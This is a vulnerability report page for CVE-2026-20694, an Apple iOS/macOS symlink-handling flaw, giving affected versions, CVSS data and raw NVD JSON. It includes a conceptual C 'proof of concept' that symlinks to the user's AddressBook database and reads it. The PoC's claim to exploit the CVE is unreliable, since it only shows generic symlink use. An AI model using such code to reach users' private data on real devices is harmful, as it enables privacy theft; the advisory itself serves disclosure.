Security Vulnerability Report
CVE-2026-20694 CVSS 5.5 MEDIUM

CVE-2026-20694

Published: 2026-03-25 01:17:06
Last Modified: 2026-03-26 20:16:09

Description

This issue was addressed with improved handling of symlinks. This issue is fixed in iOS 26.3 and iPadOS 26.3, macOS Sequoia 15.7.4, macOS Sequoia 15.7.5, macOS Sonoma 14.8.4, macOS Sonoma 14.8.5, macOS Tahoe 26.3, macOS Tahoe 26.4. An app may be able to access user-sensitive data.

CVSS Details

CVSS Score: 5.5
Severity: MEDIUM
CVSS Vector: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N

Configurations (Affected Products)

cpe:2.3:o:apple:ipados:*:*:*:*:*:*:*:* - VULNERABLE (iPadOS < 26.3)
cpe:2.3:o:apple:iphone_os:*:*:*:*:*:*:*:* - VULNERABLE (iOS < 26.3)
cpe:2.3:o:apple:macos:*:*:*:*:*:*:*:* - VULNERABLE (macOS Sonoma < 14.8.4)
cpe:2.3:o:apple:macos:*:*:*:*:*:*:*:* - VULNERABLE (macOS Sequoia < 15.7.4)
cpe:2.3:o:apple:macos:*:*:*:*:*:*:*:* - VULNERABLE (macOS Tahoe < 26.3)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
c
#include <unistd.h>
#include <stdio.h>

/*
 * PoC for CVE-2026-20694 (Symbolic Link Handling Issue)
 * This is a conceptual demonstration of how a symlink might be used
 * to access sensitive data on a vulnerable system.
 */
int main(int argc, char *argv[]) {
    // Path to sensitive user data (example)
    const char *sensitive_file = "/private/var/mobile/Library/AddressBook/AddressBook.sqlitedb";
    // Location where the app can create a file
    const char *symlink_path = "/tmp/exploit_link";

    printf("[+] Attempting to create symlink...\n");

    // Create a symbolic link pointing to the sensitive file
    if (symlink(sensitive_file, symlink_path) == 0) {
        printf("[+] Symlink created successfully at %s\n", symlink_path);

        // Try to open the file through the symlink
        FILE *fp = fopen(symlink_path, "r");
        if (fp) {
            printf("[+] Successfully opened sensitive file through symlink!\n");
            printf("[+] Data access confirmed. Vulnerability exploited.\n");
            fclose(fp);
        } else {
            printf("[-] Failed to open file.\n");
        }

        // Clean up
        unlink(symlink_path);
    } else {
        printf("[-] Failed to create symlink.\n");
    }

    return 0;
}

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-20694", "sourceIdentifier": "[email protected]", "published": "2026-03-25T01:17:06.217", "lastModified": "2026-03-26T20:16:09.393", "vulnStatus": "Modified", "cveTags": [], "descriptions": [{"lang": "en", "value": "This issue was addressed with improved handling of symlinks. This issue is fixed in iOS 26.3 and iPadOS 26.3, macOS Sequoia 15.7.4, macOS Sequoia 15.7.5, macOS Sonoma 14.8.4, macOS Sonoma 14.8.5, macOS Tahoe 26.3, macOS Tahoe 26.4. An app may be able to access user-sensitive data."}, {"lang": "es", "value": "Este problema se abordó con un manejo mejorado de enlaces simbólicos. Este problema está solucionado en iOS 26.3 y iPadOS 26.3, macOS Sequoia 15.7.4, macOS Sequoia 15.7.5, macOS Sonoma 14.8.4, macOS Sonoma 14.8.5, macOS Tahoe 26.3, macOS Tahoe 26.4. Una aplicación podría acceder a datos sensibles del usuario."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N", "baseScore": 5.5, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 1.8, "impactScore": 3.6}, {"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N", "baseScore": 5.5, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 1.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-59"}]}, {"source": 
"134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-61"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:apple:ipados:*:*:*:*:*:*:*:*", "versionEndExcluding": "26.3", "matchCriteriaId": "73ED2212-C513-4BE8-8EDB-40DF4323558E"}, {"vulnerable": true, "criteria": "cpe:2.3:o:apple:iphone_os:*:*:*:*:*:*:*:*", "versionEndExcluding": "26.3", "matchCriteriaId": "DEC63AFD-9C97-45CD-80CF-CC60DF064838"}, {"vulnerable": true, "criteria": "cpe:2.3:o:apple:macos:*:*:*:*:*:*:*:*", "versionStartIncluding": "14.0", "versionEndExcluding": "14.8.4", "matchCriteriaId": "E899D2A7-973C-4A46-B479-C245E5DFABE9"}, {"vulnerable": true, "criteria": "cpe:2.3:o:apple:macos:*:*:*:*:*:*:*:*", "versionStartIncluding": "15.0", "versionEndExcluding": "15.7.4", "matchCriteriaId": "A5F7A1AF-3DD7-4FA1-BF78-4855F83BB463"}, {"vulnerable": true, "criteria": "cpe:2.3:o:apple:macos:*:*:*:*:*:*:*:*", "versionStartIncluding": "26.0", "versionEndExcluding": "26.3", "matchCriteriaId": "0488A377-7971-4703-8823-05BF1E23CF48"}]}]}], "references": [{"url": "https://support.apple.com/en-us/126346", "source": "[email protected]", "tags": ["Release Notes", "Vendor Advisory"]}, {"url": "https://support.apple.com/en-us/126348", "source": "[email protected]", "tags": ["Release Notes", "Vendor Advisory"]}, {"url": "https://support.apple.com/en-us/126349", "source": "[email protected]", "tags": ["Release Notes", "Vendor Advisory"]}, {"url": "https://support.apple.com/en-us/126350", "source": "[email protected]", "tags": ["Release Notes", "Vendor Advisory"]}, {"url": "https://support.apple.com/en-us/126794", "source": "[email protected]", "tags": ["Release Notes", "Vendor Advisory"]}, {"url": "https://support.apple.com/en-us/126795", "source": "[email protected]", "tags": ["Release Notes", "Vendor Advisory"]}, {"url": "https://support.apple.com/en-us/126796", "source": "[email protected]", 
"tags": ["Release Notes", "Vendor Advisory"]}]}}